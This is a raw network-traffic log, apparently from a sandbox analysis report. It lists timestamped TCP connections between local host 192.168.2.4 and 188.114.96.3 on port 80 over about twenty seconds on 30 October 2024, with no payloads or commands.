                                                        Oct 30, 2024 05:25:44.049648046 CET8050267188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.402822018 CET5026780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.408159971 CET8050267188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.707228899 CET8050267188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.788110018 CET5026780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.844592094 CET8050267188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.902581930 CET5026780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.963399887 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.968785048 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.968858004 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.968966961 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.974225998 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.325937033 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.331321001 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.564275980 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.627077103 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.879240036 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.933859110 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.991169930 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.991177082 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.996567011 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.996736050 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.997411013 CET8050268188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:45.999102116 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:45.999130964 CET5026880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:46.004405975 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:46.355930090 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:46.362189054 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:46.593929052 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:46.671314955 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:46.913081884 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:46.959570885 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.039949894 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.040823936 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.047060013 CET8050269188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.047082901 CET8050270188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.047105074 CET5026980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.047174931 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.047283888 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.052557945 CET8050270188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.402976990 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.409351110 CET8050270188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.650408030 CET8050270188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.669732094 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.673043013 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.675189018 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.676115036 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.678952932 CET8050270188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.679073095 CET5027080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.695264101 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.700596094 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.819119930 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.824534893 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:47.827600956 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.831058979 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:47.836474895 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.043829918 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.049205065 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.049277067 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.399257898 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.482255936 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.482417107 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.482681036 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.499047995 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.499375105 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.527620077 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.613078117 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.668215036 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.792041063 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.840096951 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.914343119 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.914510012 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.915340900 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.920248985 CET8050271188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.920312881 CET5027180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.920746088 CET8050273188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.920816898 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.920927048 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.921035051 CET8050272188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:48.921103954 CET5027280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:48.926212072 CET8050273188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:49.277695894 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.283189058 CET8050273188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:49.515759945 CET8050273188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:49.664920092 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.845602989 CET8050273188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:49.896873951 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.961144924 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.966557026 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:49.966648102 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.966778994 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:49.973397970 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.324975014 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.330435991 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.565746069 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.605770111 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.768462896 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.881751060 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.882296085 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.887398005 CET8050274188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.887702942 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:50.893114090 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.893138885 CET5027480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.893292904 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:50.898607969 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.246479988 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.252183914 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.489684105 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.543255091 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.805154085 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.855758905 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.930111885 CET5027380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.932893038 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.933784962 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.938462973 CET8050275188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.938515902 CET5027580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.939090967 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:51.939155102 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.939264059 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:51.944508076 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:52.293488026 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:52.298923969 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:52.564661026 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:52.608053923 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:52.932770014 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:52.997052908 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.057046890 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.057049990 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.062547922 CET8050277188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.063019991 CET8050276188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.063169956 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.063170910 CET5027680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.063333988 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.068576097 CET8050277188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.418406010 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.423779964 CET8050277188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.623449087 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.623749018 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.628823042 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.628906012 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.629425049 CET8050277188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.629478931 CET5027780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.630649090 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.635978937 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.759232044 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.764642954 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.764703035 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.764854908 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.770118952 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.981782913 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:53.987334013 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:53.987452984 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.125061989 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.130661964 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.224477053 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.281049967 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.361613035 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.432622910 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.480854988 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.564503908 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.564562082 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.565124035 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.678065062 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.678158998 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.680296898 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.683728933 CET8050278188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.683885098 CET5027880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.684053898 CET8050279188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.684180021 CET5027980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.685621023 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:54.689204931 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.689204931 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:54.694560051 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.045046091 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.050494909 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.292262077 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.340118885 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.490380049 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.543235064 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.619004011 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.620064974 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.625869989 CET8050280188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.625927925 CET5028080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.626640081 CET8050281188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.626715899 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.626827002 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.637279034 CET8050281188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:55.980842113 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:55.986295938 CET8050281188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:56.220232964 CET8050281188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:56.405062914 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:56.528887987 CET8050281188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:56.607307911 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:56.649054050 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:56.654336929 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:56.654509068 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:56.654596090 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:56.659861088 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.012084007 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.017512083 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.280678988 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.371599913 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.597115993 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.712110043 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.713006020 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.717823029 CET8050282188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.717873096 CET5028280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.718338966 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:57.718404055 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.718669891 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:57.724020004 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.098272085 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.103790998 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.321968079 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.372071028 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.775212049 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.824516058 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.897895098 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.897898912 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.903275013 CET8050284188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.903667927 CET8050283188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:58.909137964 CET5028380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.909153938 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.909245968 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:58.914524078 CET8050284188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.262099981 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.267524958 CET8050284188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.435466051 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.435904980 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.441345930 CET8050284188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.441365004 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.441401958 CET5028480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.441437006 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.441534996 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.446830988 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.550312996 CET5028180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.556972027 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.562377930 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.562452078 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.562555075 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.567872047 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.793596983 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.799108982 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.799127102 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:59.918380022 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:59.923834085 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.038847923 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.090122938 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.159538984 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.217113018 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.267103910 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.309060097 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.473886013 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.473922968 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.477148056 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.598896027 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.598923922 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.599827051 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.604554892 CET8050286188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605148077 CET5028680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605489969 CET8050285188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605544090 CET5028580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605546951 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.605717897 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.605979919 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:00.611234903 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:00.969089985 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.120120049 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.202699900 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.243170977 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.439683914 CET8050287188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.496387959 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.559350014 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.564687014 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.564759970 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.564944029 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.570203066 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:01.920778990 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:01.926175117 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.162784100 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.275968075 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.409579039 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.413110018 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.469997883 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.470122099 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.473139048 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584005117 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584022045 CET5028780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.584880114 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.590045929 CET8050288188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.590194941 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.590293884 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.590306044 CET5028880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.592113972 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.597388029 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:02.953072071 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:02.958343983 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.190869093 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.230804920 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.392065048 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.433885098 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.508888006 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.509385109 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.514789104 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.514873028 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.514889002 CET8050289188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.514934063 CET5028980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.515045881 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.520339966 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:03.990576982 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:03.995975018 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.102488041 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.298247099 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.298316002 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.411545992 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.412267923 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417382002 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.417443991 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417584896 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.417644978 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417762041 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.423038006 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.762131929 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.767586946 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.025258064 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.105777025 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.222903967 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.279318094 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.279994965 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285154104 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.285202026 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285367012 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.285419941 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285589933 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.290822029 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.346829891 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.353363037 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.358841896 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.358911991 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.359066963 CET5029380192.168.2.4188.114.96.3
